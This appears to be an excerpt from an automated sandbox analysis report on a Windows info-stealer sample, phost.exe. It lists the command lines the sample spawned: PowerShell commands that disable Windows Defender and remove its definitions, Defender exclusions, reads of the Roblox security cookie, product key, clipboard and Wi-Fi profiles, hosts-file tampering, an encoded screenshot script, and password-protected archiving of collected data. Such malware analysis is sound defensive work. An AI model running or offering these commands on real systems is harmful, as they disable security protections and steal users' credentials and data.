              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Users\user\Desktop\phost.exe "C:\Users\user\Desktop\phost.exe"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\phost.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permission and try again.', 0, 'Access Denied', 48+16);close()"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LISTJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? ? .scr'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jnxiphgt\jnxiphgt.cmdline"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBE0B.tmp" "c:\Users\user\AppData\Local\Temp\jnxiphgt\CSC11F91C33F0BB4EC3B771882E34D952E.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\C7XW6.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
